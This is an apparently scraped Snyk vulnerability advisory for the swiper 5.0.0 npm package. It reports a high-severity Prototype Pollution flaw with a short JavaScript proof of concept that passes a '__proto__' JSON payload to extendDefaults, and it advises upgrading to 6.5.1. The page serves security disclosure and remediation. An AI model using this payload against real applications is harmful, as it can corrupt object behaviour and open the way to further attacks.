swiper@5.0.0 vulnerabilities

Most modern mobile touch slider and framework with hardware accelerated transitions

  • latest version

    11.1.15

  • latest non vulnerable version

  • first published

    10 years ago

  • latest version published

    24 days ago

  • licenses detected

    • >=0.9.0-beta.12 <2.7.0; >=3.0.0
  • Direct Vulnerabilities

    Known vulnerabilities in the swiper package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Prototype Pollution

    swiper is a Most modern mobile touch slider and framework with hardware accelerated transitions

    Affected versions of this package are vulnerable to Prototype Pollution.

    PoC

    var swiper = require('swiper');
    
    var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}';
    console.log("Before: " + {}.polluted); // undefined
    swiper.default.extendDefaults(JSON.parse(malicious_payload));
    console.log("After: " + {}.polluted); // HACKED
    

    How to fix Prototype Pollution?

    Upgrade swiper to version 6.5.1 or higher.

    <6.5.1